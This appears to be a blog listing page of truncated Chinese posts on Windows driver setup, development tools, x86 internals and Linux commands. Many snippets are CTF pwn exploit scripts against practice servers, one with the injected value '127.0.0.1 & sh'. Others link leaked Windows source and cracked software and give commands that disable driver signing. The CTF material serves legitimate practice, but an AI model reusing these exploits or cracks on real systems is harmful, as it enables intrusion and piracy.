、moddemod

写在前面的话编译环境：VS2019 + win10// pch.h#define WIN32_LEAN_AND_MEAN#include <Windows.h>#include <WinSock2.h>#pragma comment(lib, "Ws2_32.lib")#include <stdio.h>#include <iostream>using namespace std;// server.cpp#include "p

写在前面的话因为对象需要，找了一下资料，这里分享给有需要的小伙伴，资源来源于网络，侵删！计算机等级考试二级C语言考试大纲http://ncre.neea.edu.cn/html1/report/20122/1392-1.htm因为考纲内使用的环境是Microsoft Visual C++ 2010 学习版Microsoft Visual C++ 2010 学习版 安装：下载链接：推荐用迅雷下载：(直接复制即可下载)ed2k://|file|cn_visual_studio_2010_e

写在前面的话笔者的文章环境 物理Win10 + VMware® Workstation 16 Pro + 虚拟Winxp + 虚拟Win7 + 虚拟Win10+VS2019+wdk10widnows xpwinxp因为微软以及不提供支持了，所以服务器上并找不到符号表推荐使用下面的方案：链接：https://pan.baidu.com/s/1RfHUyE6vXrau_Cvf1Zlnew 提取码：ao9r vmwarewindgb\\.\pipe\com1winxpmulti

写在前面的话win7以后是需要进行驱动签名的，在开发驱动的时候有两种解决方案，一种是直接启用测试模式，关闭驱动签名，另一种是使用签名工具第一种方案测试模式，在测试模式下可以运行非bai官方或无数字签名的驱动程序 。bcdedit /set testsigning on # 开启bcdedit /set testsigning off # 关闭或者直接强制禁用驱动签名bcdedit /set loadoptions DDISABLE_INTEGRITY_CHECKS # 禁用bcdedit

写在前面的话就不多废话了，有需要的直接copy过去就可以用… 学习！// 该函数在debug以及release都有用DbgPrint("hello, world!
");DbgPrint("调制解调人人生！
");// 这个函数在release下没有作用KdPrint(("nihao
")); // 注意这个要使用双括号KdPrint(("调制解调人生kdPrint...
"));STRING str = { 0 };RtlInitString(&str, "nihao

写在前面的话资源来源于网络，仅技术分享！高达50G左右的文件，包含winxpsp1 以及win2003的源码，如果想下载该文件，请使用下面链接里面的种子文字使用迅雷下载即可！源码文档笔者已经打包成chm文档，方便使用查询阅读！https://wws.lanzous.com/b01i0vihg密码:6666确实是Windows源码，很nice，方便学习研究之用！如果有帮打你，记得点个赞，谢谢！...

写在前面的话资源来源于网络，jdk1.8笔者在网上找的资源存在广告，发布的为去除广告的jdk1.8中文版，只为技术分享，如果冒犯请联系删除！在线中文文档https://tool.oschina.net/apidocs/apidoc?api=jdk-zh离线版中文文档JDK1.6API官方 中文版https://wws.lanzous.com/ihcbtko4ineJDK1.8谷歌翻译中文文档https://wws.lanzous.com/ijXcNksvbuf最后的话如果有帮到

写在前面的话智能提示助手，你值得拥有，非常好用的开发神器，资源来源于网络！笔者亲测Win 10+VS2019+VS2017通过！安装下载链接：https://wws.lanzous.com/ioF3okm1g0j下载后直接双击安装即可！安装完以后，找到自己的VS所在的安装目录，替换到对应的VA_X.dll即可！注意下面截图的路径！VS2019VS2017如果有帮到你，请点个赞，谢谢！...

HFUT今日校园假期信息收集自动提交可自动定时批量提交可自定义任何定位地址支持个人交互式填写打包了win平台的exe文件废话不多说，直接上源码吧！import requestsimport osimport jsonimport platformimport timeimport threadingfrom Crypto.Cipher import AESimport base64import refrom urllib.parse import quotefrom a

笔者演示环境为Win10+VS2019在VS201x中可直接对API进行F1会跳转到MSDN的在线文档，但是有时候网速很慢，这篇文章解决如何将在线文档下载到本地方便开发学习！打开VS2019，在菜单栏帮助下，如果没有添加和删除帮助内容通过菜单栏目工具->获取工具和功能打开Visual Studio Installer，选择单个组件安装Help Viewer安装成功后即可出现添加和删除帮助内容直接下载可能很慢，可能需要科学上网才可以快一点。来到VS2019出现了添加和删除帮助内容

不显示基显示符方式一：cout << hex; /*十六进制*/cout << oct; /*八进制*/cout << dec; /*十进制*/方式二：#include <iomanip> /*注意要包含该头文件*/// 这种方式需要包包含头文件cout << setbase(16) << 14 << endl;显示基指示符方式一：```cppcout.setf(ios::showbase | i

写在前面的话演示环境VS2019+Windows10+微信win3.0.0.57+DetourDetour库编译项目地址：https://github.com/microsoft/Detours代码直接git clone拉取下来，打开VS2019的开发环境配置nmake /f makefile配置VS2019配置项目属性或者不用操作第三步#pragma comment (lib,"detours.lib")这样环境就算配置好了…下面贴一下关键代码吧…#include

https://docs.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk在你啥都不懂的时候，连搭建环境都是一件很头大的事，这篇文章主要是解读一下上面的文章，文章是官方的，其实写得非常清楚。但是有几点需要注意的事项！注意安装顺序一定要先安装Visual Studio 2019这里三个版本随意选一个，通常选社区版就可以了。安装过程，工作负载这里选择使用C++的桌面开发。因为SDK（软件开发工具包）需要与WDK（驱动开发工

ida, ollydbg, windbg,visual studio 2019等调试符号服务器配置windows环境调试符号配置，如果你只设置_NT_SYMBOL_PATH可能会很慢很慢，甚至不能加载，原因你懂的，解决方案就是配置_NT_SYMBOL_PROXY进行流量转发，前提是你可以网科学上。直接配置系统环境变量_NT_SYMBOL_PATHSRV*F:\Debug_Symbol\Symbols32*http://msdl.microsoft.com/download/symbols_NT_S

刚开始没什么感觉，突然换了一个导员，某天忘填了还要跑办公室一趟，很是心烦，班长还跑来寝室一个个提醒，于是诞生了这篇文章。这个应该不是我第一个分析的软件了，原理都很简单，莫过于后台交互，模拟提交即可，首先第一步当然是抓包分析了。笔者是手机IOS系统，其实抓包的分析的方式非常多，我首先打开了Fiddler，但是到填信息的页面，显示未认证的证书，于是我我就是用了burpsuite，成功抓取，分析了一波，发现数据在我们学校的服务器上，顺着域名，找到了今日校园的web后台。这套系统大概就是今日校园给各大高校的提供的

写在前面的话网上的教程很多了，主要是记录一下。Cheat Engine源码官网：https://cheatengine.org/项目地址：https://github.com/cheat-engine/cheat-engine/这里最新版本7.2，我们就编译一个7.2的版本吧安装编译环境Lazarus是以Free Pascal编译器为基础的Pascal语言的整合开发环境（IDE）。下载如果不方便下载，可通过下面链接下载！链接：https://pan.baidu.com/s/1dwwfd

https://www.jianshu.com/p/84e16d4a067b

最好的学习资料莫过于官方文档了！这个链接主要提供了各个卷的下载，有各个卷分开的版本，也有合在一起的版本下载。第1卷：介绍支持IA-32和Intel®64体系结构的处理器的体系结构和编程环境。第2卷：包括完整的指令集参考AZ。描述说明的格式，并提供说明的参考页。第3卷：包括完整的系统编程指南，第1、2、3和4部分。描述了Intel®64和IA-32体系结构的操作系统支持环境，包括：内存管理，保护，任务管理，中断和异常处理，多处理器支持，热和电源管理功能，调试，性能监控，系统管理模式，虚拟机

IA-32CPU设计了5个控制寄存器CR0-CR4，用来决定CPU的操作模式以及当前任务的关键特征。CR0PE位是启用保护模式的标志 1 保护模式 0 实模式PG位是开启分页机制的标志WP位是写保护标志，当该位设置时，特权级程序在面对只读的物理页时，是不能写的，只可以读；如果没有该位，则特权程序随意读写。CR2当有程序访问到某些不在物理内存中的页对应的内存地址时，CPU便会产生一个页错误异常（缺页异常），此时就会所缺的内存地址的线性地址便会存储到CR2寄存器中，后续CPU会

调用门 通过GDT表查询任务门 中断门 陷阱门 通过IDT表查询门其实就是一种转换机构，这里谈到的各种概念都是针对CPU的，人家intel工程师就是这样设计的一套理念，你只需要理解即可。保护模式之所以称之为保护模式，重在保护二字，因为在保护模式的前一个版本实模式下，所有的不管是系统的数据还是用户的数据都是混在一块的，如果你一个不小心改写了某块系统部分的数据，结果就是系统直接崩溃！这显示是很不可取的，所以intel后来设计了保护模式，所谓保护可以理解为保护操作系统不受用户轻易破坏！本质还是一样的，所

在计算机科学中，反射（英语：reflection）是指计算机程序在运行时（runtime）可以访问、检测和修改它本身状态或行为的一种能力。[1]用比喻来说，反射就是程序在运行的时候能够“观察”并且修改自己的行为。直接上一个例子吧class Person(object): grade = 10 def __init__(self): pass def info(self): print('我是person类的info方法')# getat.

中断在计算机系统中，包括任务切换、时间更新、软件调试在内的很多功能都是依靠中断和异常机制实现的。中断和异常是计算机原理中重要的概念。中断通常是由CPU外部的输入输出设备（硬件）所触发的，供外部设备通知CPU处理请求，因为又叫中断请求。中断请求时希望CPU暂时停止当前正在执行的程序，转去执行中断请求所对应的中断处理例程（Interrupt Serivce Routine）。中断分为可屏蔽中断（maskable interrupt）和不可屏蔽中断（Non-Maskable Interrupt）。对于一

windowsDosboxDOSBox是一个模拟器，可重新创建与MS-DOS兼容的环境。https://www.dosbox.com/debuglinkmasm下面附上上面工具打包的链接！百度云链接：https://pan.baidu.com/s/1dBZlV4IKJjmNxl4UxOsecw 提取码：5myn蓝奏云https://wws.lanzous.com/iQjXmgbke7i之后直接双击安装完dosbox后，启动可以看到dosbox启动的加载的配置文件，如下图

进入图标启动目录cd /usr/share/applications创建编辑图标文件sudo vi firefox.desktop根据你的二进制程序的位置[Desktop Entry]Type=ApplicationComment=firefoxName=FirefoxIcon=firefoxExec=<你的可执行程序的二进制路径>Terminal=falseCategories=Application;如下实例最后效果...

段寄存器通常有CS DS SS ES，80386后引入了2个额外的段寄存器FS与GS。大量的书籍上，都描述了段寄存器是16位的，这是一种非常不严谨的说法！这些段寄存器除了有16位的可见部分，还有不可见的隐藏部分，称为描述符缓存“descriptor cache”或隐藏寄存器“shadow register”[1]。当一个段选择符（segment selector）装入段寄存器的可见部分，处理器同时也把该段描述符的其它数据装入到段寄存器的隐藏部分，这包括段开始的基地址、段长度、访问控制信息等。这些信息缓

写在前面的话文章截图MySQL环境版本5.7.31-0ubuntu0.18.04.1什么是SQL？SQL(Structured Query Language，结构化查询语言)，是一种数据库查询和程序设计语言，用于存储数据以及查更新和管理关系数据库系统。说人话就是SQL可以理解为一种操作关系型数据库（这里关于什么是关系型数据库与非关系型数据库，可自行查询资料学习）的编程语言，既然是编程语言，就和C语言等其他语言一样具有自己的语法，有自己的规则，只是它只专注于数据库系统的操作。什么是SQL注入？

C语言不定参数主要使用下面几个宏。实现本质为一个arg_ptr的指针移动，其实也很容易理解，参数再多，也就是在栈上，数据类型确定其数据长度的，移动指针即可一依次取出参数。type va_arg( va_list arg_ptr, type);void va_copy( va_list dest, va_list src); // (ISO C99 and later)void va_end( va_list arg_ptr);void va_start( v

学了C语言，你都了解ANSI C、GNU C、ISO、ANSI、GNU你都了解吗？ISOISO（International Organization for Standardization，国际标准化组织）ANSIANSI(American National Standards Institute，美国国家标准协会)ANSI C也就是美国国家标准协会发布的C语言的标准，因为这个东西本来就是人家创建的，所以他说的就是标准，就是这么简单。下面说的各个C语言的发布版本都是C语言的标准，只是版本的更迭。

官网：https://www.sweetscape.com/好用的二进制文件编辑器，带有模板功能，方便解析PE格式以及elf格式等二进制文件https://wws.lanzous.com/i1E7slp0l3a直接双击安装后，找到安装目录下的010Editor.exe，替换掉即可！ELF格式解析PE格式解析...

lsof，list open files，列出打开的文件因为在Linux的哲学艺术在于一切皆文件，所以不管是普通文件，还是套接字等都表征为一个文件，对于网络连接等也可以通过该命令查看关于更多每一列的详细信息请参考man手册。常用参数-i select IPv[46] files-n no host names-P no port names-U select Unix socket-d select by FD set-c cmd-p select PIDs基本用法# 列出指定

BIOS+MBRBIOS(Basic Input Output System，基本输入输出系统)，是一组固化到计算机内主板上一个ROM芯片上的程序，它保存着计算机最重要的基本输入输出的程序、开机后自检程序和系统自启动程序，它可从CMOS中读写系统设置的具体信息。 其主要功能是为计算机提供最底层的、最直接的硬件设置和控制CMOS是主板上的一块可读写的并行或串行FLASH芯片，是用来保存BIOS的硬件配置和用户对某些参数的设定。这是传统的启动方案。机器通电以后，从BIOS中载入指令进行一系列自检

写在前面的话文章主要是着重介绍一下机械硬盘结构，寻址。固态硬盘固态硬盘wiki固态硬盘或固态驱动器（英语：Solid-state drive或Solid-state disk，简称SSD）是一种主要以闪存（NAND Flash）作为永久性存储器的电脑存储设备。固态硬盘采用SATA、PCI Express、mSATA、M.2、ZIF、IDE、U.2、CF、CFast等接口。简单说固态硬盘拆开里面都是这种集成电路，只看得见一堆电子元器件！最大的好处就是存取速度相对于机械硬盘快很多，缺点是相当于

网上有人说这个问法不严谨，我觉得严格说确实是这样，但是我个人觉得不能这样说！举个例子，这个问题就好比你上初中的时候那些证明题很多其实是很不严谨的，但是限于知识体系，到高中你会发现好像不是那么一回事，到了大学你又会发现另外新的东西！但是你能回去说初中老师教的都是错的吗？我觉得不能吧！只能说你看待问题的角度以及一个系统的宏观视角的更深入了，看待问题更明白了！回到这个问题，一个字等于多少字节？首先一个字节等于八位这是毋庸置疑的，因为存储系统逻辑地址的编址便是以字节为单位进行编址的，计算机运算二进制这是人所共

官网：https://www.listary.com/下载方便快捷，安装简单！超高的文件搜索效率！！强大的个性化定制！！！安装完成以后，连续按两次Ctrl键就可以启动搜索窗口opt 启动菜单gg <关键字> 谷歌搜索bd <关键字> 百度搜索模糊搜索文件以及应用最后如果有帮到你，记得点个赞哦！...

资源来源于网络，仅作为学习交流，侵删！百度云链接：https://pan.baidu.com/s/17SY_HK_GlbfBUcYZOMlFZg 提取码：me35蓝奏云https://wws.lanzous.com/b01hla3mf密码:agsocsdnhttps://download.csdn.net/download/weixin_43833642/12702172汇编语言程序设计：基于ARM体系结构(第3版) /文全刚, 郝志刚主编https://wws.lanzo.

最新版本：https://visualstudio.microsoft.com/zh-hans/downloads/历史版本：https://visualstudio.microsoft.com/zh-hans/vs/older-downloads/Visual Studio分为社区版、专业版以及企业版，个人使用选择免费的社区版就可以了。下载历史版本可能需要登录，如果没有账户注册一个就行了，免费的。选择你想要的版本下载因为SDK还是挺大的，慢慢等下载安装完就可以了…...

官网：http://nginx.org/axel -n 20 -a http://nginx.org/download/nginx-1.18.0.tar.gztar zxvf nginx-1.18.0.tar.gz && cd nginx-1.18.0yum install pcre pcre-devel\ zlib zlib-devel\ openssh openssh-devel\ -y ./configure\ --prefi

Download the source codeaxel -n 50 -a http://mirrors.sohu.com/php/php-7.1.6.tar.gztar zxvf php-7.1.6.tar.gz && cd php-7.1.6下面都是编译需要的第三方开发库yum install libxml2 libxml2-devel \ openssl openssl-devel \ bzip2 bzip2-devel \ libcurl libcurl-

官网：https://redis.io/中文网：http://www.redis.cn/项目地址：https://github.com/redis/redisLinux关于Linux下手动编译一定要注意gcc版本gcc --version，如果太低可能导致编译失败，升级gcc版本就可以了centos安装前的准备工作# 安装gcc套件yum install cpp binutils glibc glibc-kernheaders glibc-common glibc-devel gcc

这个问题通常是由于编码问题导致的，因为GBK与Unicode编码机制是不一样的，而UTF-8是Unicode的一种物理实现，可能你遇到的情况不太一样，但是问题的根本原因都是编码机制的不同导致的，Windows中文版本通常默认采用GBK编码方式，但是更通用的Unicode也是存在的，有时候某些软件的设置与实际编码不符时，便会出现乱码情况，即不能正确解析！关于编码的基本知识可参考这里。对于IDEA来说，将项目设置成UTF-8会是更好的选择！还有一种情况就是，你在开发时候写的代码用的字体本来就不支持中文，那

EPEL（Extra Packages for Enterprise Linux），企业级Linux提供的额外软件包，包括但不限于Red Hat Enterprise Linux (RHEL), CentOS and Scientific Linux (SL), Oracle Enterprise Linux (OEL)提供了大量软件包可供centos使用，只需要使用yum即可快捷安装！安装这种方式默认安装的是官方源，国内会比较慢！yum install epel-release -y推荐使.

笔者是为了更换默认的字体为Mac的苹方字体而找到的这款工具…你也可以不适用工具手动修改，但是比较麻烦，这个项目很方便我们修改系统默认字体，修改后重启就能全部生效！项目地址：https://github.com/Tatsu-syo/noMeiryoUI下载地址：https://github.com/Tatsu-syo/noMeiryoUI/releases去网上下载你想要的效果字体，直接双击安装，打开noMeiryoUI选择你安装的字体即可！这里附上Mac的苹方字体下载链接：http://w

基本配置修改配置vim /etc/ssh/sshd_config一些参数端口转发中几个常用的参数-f Requests ssh to go to background just before command execution.-N Do not execute a remote command.-C Requests compression of all data -g Allows remote hosts to connect to local forwarded po

关于Linux子系统因为windows是闭源的，这个系统的核心理念是给用户提供一个简单快捷方便的操作，可以什么都不懂就能鼠标点点点完成一个软件从安装到使用到卸载的全部过程。唯一提供的给用户的cmd或者powershell这种命令接口，功能着实有限，和Linux提供的shell完全没法比，对于开发者来说是真的难受！我们不知道他提供该子系统的初衷是啥，但是就功能上来说，还是方便很多吧，首先他这个子系统是和真实物理机公用一套硬件资源，和虚拟机中那种虚拟技术不一样，然后在Linux子系统中，系统默认将windo

lspcihttps://yq.aliyun.com/articles/653209?utm_content=m_1000018739lshwhttps://www.linux-man.cn/command/lshwdmesghttps://www.cnblogs.com/zhaoxuguang/p/7810651.htmldmidecodehttps://www.cnblogs.com/pzk7788/p/10314436.htmlhttps://ipcmen.com/dm..

proxychains安装sudo apt install proxychains -y编辑配置文件sudo vim /etc/proxychains.conf在需要使用代理的命令前面添加proxychains即可环境变量直接在终端添加即可export ALL_PROXY=[协议名]://主机:端口export http_proxy=http://192.168.0.77:8080export https_proxy=http://192.168.0.77:8080# 或者ex

curl is a tool to transfer data from or to a server, using one of the supported protocols (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP,RTSP, SCP,SFTP,SMB, SMBS, SMTP, SMTPS, TELNET and TFTP).The command is d.

安装ubuntusudo apt install axelmacbrew install axelarchlinuxpacman -S axel基本用法用法: axel [选项] 地址 1 [地址 2] [地址…]--max-speed=x -s x 指定最大速率（字节/秒）--num-connections=x -n x 指定最大连接数--output=f -o f 指定本地输出文件--search[=x] -S [x] 搜索镜像并从 X 服务器下载--header

wget 非交互式的网络下载工具【不支持多线程】基本用法GNU Wget 1.18，非交互式的网络文件下载工具。用法： wget [选项]... [URL]...启动： -V, --version 显示 Wget 的版本信息并退出 -h, --help 打印此帮助 -b, --background 启动后转入后台 -e, --execute=命令

BlackArch 是一款基于 ArchLinux 的为渗透测试及安全研究人员开发的发行版，相当于 Arch 版的 BackTrack/Kali。vim /etc/pacman.conf添加[blackarch]Server = https://mirrors.ustc.edu.cn/blackarch/$repo/os/$arch导入GPG keysudo pacman -S blackarch-keyringsudo pacman -Sy...

配置源sudo apt edit-sources添加下面kali源阿里源deb https://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib中科大源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free

picoctf_2018_buffer overflow 2expfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause()proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name)p = remote('node3.buuoj.cn', 28375)elf =

存在沙盒机制，禁用了execve，只能调用orw直接读flag了…#! /usr/bin/python3from pwn import * ...

[BJDCTF 2nd]secretexpfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause()proc_name = './secret'p = process(proc_name)# p = remote('node3.buuoj.cn', 28831)

picoctf_2018_buffer overflow_1expfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1'# p = process(proc_name)p = remote('node3.buuoj.cn', 28190)e

expfrom pwn import *from LibcSearcher import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause()def store(content): p.sendlineafter('>> ', str(1)) p.send(content)def print(): p.sendlineafter(..

expfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32'# p = process(proc_name)p = remote('node3.buuoj.cn', 27478)elf = ELF(proc_name)read_got = elf.got['read'..

expfrom pwn import *from LibcSearcher import *context.log_level = 'debug'proc_name = './bof'# p = process(proc_name)p = remote('node3.buuoj.cn', 25483)elf = ELF(proc_name)main_addr = elf.sym['main']write_plt = elf.plt['write']write_got = elf.go.

项目地址：https://github.com/tsl0922/ttyd该文章的环境是ubuntu18.04Linux下需要手动编译sudo apt-get install build-essential cmake git libjson-c-dev libwebsockets-devgit clone https://github.com/tsl0922/ttyd.gitcd ttyd && mkdir build && cd buildcmake ..ma

可以看到第二个read才存在溢出，但是因为两个函数帧栈是紧挨着的，只有rbp与call指令下一条指令的地址即返回地址，这里可以溢出0x10字节大小的数据，即rbp + ret，然后就回到了第一个read所在的函数帧栈，此时可以接着利用构造rop读取flag即可…这道题开的保护挺多的，首先栈不可执行，其次地址随机化，也就是当前elf文件每次装载到内存中的位置都是变动的，因为无法获取装载基址，所以构造的rop只能从泄露的libc中获取，同样构造的缓冲区也是libc对应的可读写位置.0是标准输入，1是.

IANA 就是指(Internet Assigned Numbers Authority) ，Internet号分配的机构。负责对IP地址分配规划以及对TCP/UDP公共服务的端口定义。查询地址：http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?skey=7&page=17搜索...

项目地址：https://github.com/i3/i3status/blob/master/contrib/net-speed.sh下载：sudo apt install subversionsvn checkout https://github.com/i3/i3status/trunk/contrib可执行权限cd contribchmod +x net-speed.sh配置configstatus_command <net-speed.sh位置># statu.

注意上图，因为bss与got表位置比较近，所以要尽可能的抬高栈顶指针即rsp，不然在后续调用其他函数的时候，会因为一些push操作或者sub使得栈顶指针减小覆盖到got中的内容导致无法泄露libc或者使得程序无法正常运行…from pwn import *from LibcSearcher import *context.log_level = 'debug'proc_name = './gyctf_2020_borrowstack'p = process(proc_name)p = r..

tcache机制的利用，通过unsorted泄露进而将堆空间开辟到libc中，写__free_hook拿到shell…expfrom pwn import *context.log_level = 'debug'def pause_debug(): log.info(proc.pidof(p)) pause()def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.

SwitchyOmega官网：https://proxy-switchyomega.com/github下载：https://github.com/FelisCatus/SwitchyOmega/releases官网下载：https://proxy-switchyomega.com/download/chrome也可以直接在应用商店中（这个方法需要点科技）安装firefox应该可以直接在应用商店搜索即可！效果如下，方便切换！...

Mac默认安装了ssh以及sshd，但是默认是没有开启sshd的，如果我们需要远程登录的话，需要手动开启。首先需要在系统偏好设置->共享设置下面远程登录启动sshd如果你启动遇到下面的问题，就依次看下去需要绝对路径运行1no hostkeys avalable注意需要root权限，不然会提示没有权限写，毕竟是/etc目录sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_keysudo ssh-keygen -t rsa -f /et

这道题应该是之前做过的…expfrom pwn import *context(arch='i386', log_level='debug')p = remote('node3.buuoj.cn', 27912)payload = asm(shellcraft.open('./flag') + shellcraft.read('eax', 'esp', 0x30) + shellcraft.write(1, 'esp', 0x30))p.sendafter('shellcode:', pa

expfrom pwn import *context.log_level = 'debug'proc_name = './PicoCTF_2018_rop_chain'p = remote('node3.buuoj.cn', 27027)elf = ELF(proc_name)flag_addr = elf.sym['flag']win_function1 = elf.sym['win_function1']win_function2 = elf.sym['win_function2'

这题我写这个exp是在ubuntu18的环境下写的，远程和本地的IO交互的数据不太一样，下面的exp在远程可以拿到shell，本地可能需要修改一下…expfrom pwn import *from LibcSearcher import *context.log_level = 'debug'proc_name = './level1'p = process(proc_name)# p = remote('node3.buuoj.cn', 29850)elf = ELF(proc_na.

ubuntu18.04 libc-2.27有Tcache机制，这道题malloc的指针数组在free的时没有置空…expfrom pwn import *context.log_level = 'debug'def pause_debug(): log.info(proc.pidof(p)) pause()def add(size): p.sendlineafter('choice:', str(1)) p.sendlineafter('size?', st.

expfrom pwn import *p = remote('node3.buuoj.cn', 28110)p.sendlineafter('choose:', b'1')p.sendlineafter('address', b'127.0.0.1 & sh')p.interactive()

注意这题开启了Canary因为限制了payload长度就不可以写got表了，但是可以直接泄露Canary值，在vuln中进行栈溢出即可拿到shell…expfrom pwn import *from LibcSearcher import *context.log_level = 'debug'proc_name = './bjdctf_2020_babyrop2'elf = ELF(proc_name)p = process(proc_name)p = remote('node3..

expfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause()def new_note(idx, _type, length, value): p.sendlineafter('CNote > ', str(1)) p.sendlineafter('Index > ', str(idx)) p.sendlin..

官网：https://portswigger.net/burp打开burpsuite配置本地代理-Xms128M -Xmx512M -XX:PermSize=64M -XX:MaxPermSize=128M-Xms128m JVM初始分配的堆内存-Xmx512m JVM最大允许分配的堆内存，按需分配-XX:PermSize=64M JVM初始分配的非堆内存-XX:MaxPermSize=128M JVM最大允许分配的非堆内存，按需分配因为burpsuite是java开发的工具，运行的时候会

下面的地址主要是因为这题没开PIE，地址是不会变化的…下图是构造的chunk写magic变量expfrom pwn import *context.log_level = 'debug'def pause_debug(): log.info(proc.pidof(p)) pause()def create(size, content): p.sendlineafter('choice :', str(1)) p.sendlineafter('Heap..

关于mprotect可参考mprotect静态链接的可执行文件，利用mprotect修改bss可执行，写入shellcode后跳转即拿到shell…from pwn import *context.log_level = 'debug'proc_name = './simplerop'p = process(proc_name)# p = remote('node3.buuoj.cn', 25491) ..

expfrom pwn import *context.log_level = 'debug'proc_name = './login'# p = process(proc_name)p = remote('node3.buuoj.cn', 29641) ...

我终于把buuctf这个平台上所有1分的pwn给刷完了....我以为后面都会是堆的题目，但是很明显这道题是栈的.....from pwn import *context.log_level = 'debug'proc_name = './memory'p = process(proc_name)p = remote('node3.buuoj.cn', 29878)elf = ELF(proc_name)system_plt = elf.plt['system']main_addr =.

注意这一题限制了申请的chunk大小最大为0x6f，所以需要连续申请两个0x68大小的chunk…expfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause()def add(size, content): p.sendlineafter('choice:', str(1)) p.sendlineafter('size?', s.

比较简单，直接留了后门！expfrom pwn import *context.log_level = 'debug'def pause_debug(): log.info(proc.pidof(p)) pause()def add_note(size, context): p.sendlineafter('choice :', str(1)) p.sendlineafter('size :', str(size)) p.sendafter('Con.

安装sshd服务端如果你对ssh不太了解，可以参考一下这篇文章添加后打开终端cmdnet start sshd # 启动net stop sshd # 关闭也可以使用scp传输文件…设置账户密码如果你的账户没有设置密码的话，需要先设置一下密码可以在终端中直接修改或者通过下面的方式手动点然后再连接就行了修改administrator账户的名字如果连接的时候发现administrator名字太长了，难搞，需要修改成自己的可以通过下面的方式操作！如果有用，

溢出一个字节,修改size域expfrom pwn import *context.log_level = 'debug'def debug_pause(): log.info(proc.pidof(p)) pause()def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size))def write_note(index,...

expfrom pwn import *context.log_level = 'debug'proc_name = './bjdctf_2020_babystack2'p = process(proc_name)p = remote('node3.buuoj.cn', 26363) ..

expfrom pwn import *from LibcSearcher import *context.log_level = 'debug'proc_name = './level4'p = process(proc_name)# p = remote('node3.buuoj.cn', 27523) .

我真是吐了，前一天做到这一题，本来都是非常简单的，但是我在众多p64()中写了一个p32()两天了也没看出来，今天决定打开gdb调试的时候，发现写了一个p32()，心态都崩了…expfrom pwn import *from LibcSearcher import *context.log_level = 'debug'proc_name = './level3_x64'p = process(proc_name)# p = remote('node3.buuoj.cn', 2709..

expfrom pwn import *context.log_level='debug'proc_name = './guestbook'p = remote('node3.buuoj.cn', 29838)elf = ELF(proc_name)payload = flat(['a' * (0x88), p64(0x400620)])p.sendafter('message:', payload)p.recv()p.recv() ..

expfrom pwn import *context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause()proc_name = './fm'p = process(proc_na.

这题我也不知道要表达什么，上一题还是堆题，这有点突兀…就32位的int 80系统调用，eax存放系统调用号，只是这里搞了一下，sub相减后就是11，就是execve，参数上面已经push了，直接就获得一个shell…from pwn import *p = remote('nde3.buuoj.cn', 27909) p.interactive().

有符号表，而且直接留了后门！expfrom pwn import * context(log_level='d.

未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋其实做pwn题我感觉都是只可意会，但并非不可言传，只是说了感觉和说废话一样，没有什么实质性的作用，最最重要的是要自己多去操作调试，pwn多了也就那样吧！但是最核心的永远是你coding的能力！虽然在干着逆向的事，但是coding的能力决定了你的高度！ ----小白感悟这道题问题出现在更新的时候边界的判断方法有问题，结合的堆的机制，就可以形成堆溢出！添加一个用户会申请两个chunk，后一个chunk的内容为.

安装dockeryum updateyum install -y yum-utils device-mapper-persistent-data lvm2yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo# http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo 推荐使用阿里源 比较快yum install

访问速度相对会快很多（只方便查阅文档，下载源码还是从原php.net下载比较慢）http://php.p2hp.com/下载镜像http://mirrors.sohu.com/php/

expfrom pwn import *from LibcSearcher import *context(log_level='debug')proc_name = './level3'p = process(proc_name)# p = remote('node3.buuoj.cn', 28793)elf = ELF(proc_name)main_addr = elf.sym['main']write_plt = elf.plt['write']write_got = elf..

开启了Canary，但Canary失败的处理逻辑会进入到stack_chk_failed函数，stack_chk_failed函数是一个普通的延迟绑定函数，可以通过修改GOT表劫持这个函数。expfrom pwn import *context(log_level='debug')proc_name = './r2t4'p = process(proc_name)# p = remote('node3.buuoj.cn', 29985)elf = ELF(proc_name)__...

expfrom pwn import *from LibcSearcher import *context(log_level='debug')proc_name = './bjdctf_2020_babyrop'p = process(proc_name)# p = remote('node3.buuoj.cn', 28227)elf = ELF(proc_name)read_got = elf.got['read']puts_plt = elf.plt['puts']main_.

ssh ctf@node3.buuoj.cn -p <port>查看test.c源码，这里过滤了'nepbushiflag|/$-<>.'这些字符，如果绕过直接调用system(user_input)当前用户ctf属于ctf组，这里要注意test设置了特殊权限位g位，而且flag文件与test同属于同一个用户组ctf_pwn，设置了g位，当test程序运行的时候，它的有效用户组(egid)就会变成文件的所属用户组即ctf_pwn。对于flag文件，它所在用户组的的成

简单分析：两次read都往同一个地方填数据（s栈变量的位置），可输入0x30大小，s离ebp距离0x28，可通过printf泄露压入的上一个栈帧的ebp，之后通过第二次read构造leave控制espfrom pwn import *def debug_pause(): log.info(proc.pidof(p)) pause()context(log_level='debug')proc_name = './ciscn_2019_es_2'p = process(proc_name.